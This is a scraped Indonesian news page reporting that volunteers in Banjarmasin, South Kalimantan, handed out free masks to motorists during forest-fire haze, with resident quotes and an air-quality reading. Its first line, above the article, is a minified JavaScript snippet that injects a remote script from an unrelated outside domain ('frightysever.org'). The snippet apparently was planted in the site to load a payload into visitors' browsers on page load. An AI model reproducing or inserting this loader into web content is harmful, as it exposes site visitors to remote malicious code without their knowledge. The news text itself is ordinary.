(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kanal

Kabut Asap Bikin Tak Sehat, Ratusan Masker Ludes Dibagikan Sekejap


MARABAHAN, Belasan anggota Emergency Triple 4 Banjarmasin membagikan masker gratis kepada pengendara yang sedang melintas di perempatan Pos Lantas, Handil Bakti, Kecamatan Alalak, Kabupaten Barito Kuala, menyusul kabut asap yang terjadi di Kalimantan Selatan.

Aksi bakti sosial ini untuk menghindari dampak kabut asap yang diakibatkan Karhutla. Pembagian masker gratis disambut antusias pengendara. Alhasil dalam waktu singkat masker yang dibagikan ludes.

“Pembagian masker gratis ini kegiatan yang sangat positif, dampak dari kebakaran lahan yang menimbulkan asap seperti di perbatasan Batola-Banjarmasin ini, dapat mengganggu kesehatan, ya semoga bermanfaat,” ujar Ansari salah seorang warga asal Banjarmasin yang melintas.

Tanggapan serupa juga diutarakan Anton, warga Handil Bakti yang bepergian ke Kabupaten Banjar bersama istri dan anaknya dengan roda dua. Kondisi udara yang tidak sehat sudah mulai dirasakannya di kawasan tersebut, terlebih pada pagi dan malam hari.

“Dengan adanya masker ini ya semoga kita terhindar dari penyakit, di kawasan ini sering sekali kabut asap terjadi, terlebih di puncak musim kemarau seperti ini,” singkatnya.

Diketahui kabut asap yang kembali melanda sebagian kota Banjarmasin pada Sabtu (7/9) kemarin, membuat indeks kualitas udara dipastikan tak sehat. Asap Karhutla di Banjarmasin ditandai dengan kondisi langit yang berwarna abu-abu dan bau yang tidak sedap.

Berdasarkan data yang didapat dari situs AirVisual.com yang mengukur konsentrasi debu halus PM2,5. Saat diakses pada pukul 09:58 Wita menunjukkan, kualitas udara Banjarmasin tidak sehat, dengan indeks sebesar 154 berdasarkan US Air Quality Index (AQI), dengan konsentrasi polutan sebesar 62 µg/m³.

Sehingga, AirVisual.com menyarankan bagi masyarakat yang akan melakukan pekerjaan di luar ruangan untuk menggunakan masker atau penutup wajah agar tidak terpapar secara langsung oleh kualitas udara buruk.

Meski demikian, data yang disajikan melalui AirVisual.com tidak bisa dijadikan acuan dalam mengukur kualitas udara. Namun kabut asap di kota Banjarmasin sendiri, diduga merupakan kiriman dari daerah tetangga, seperti Kabupaten Barito Kuala dan Kabupaten Banjar. (rendy)

Reporter : Rendy
Editor : Bie

 


Desy Arfianty

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

50 menit ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

2 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

3 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

3 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

4 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

6 jam ago

This website uses cookies.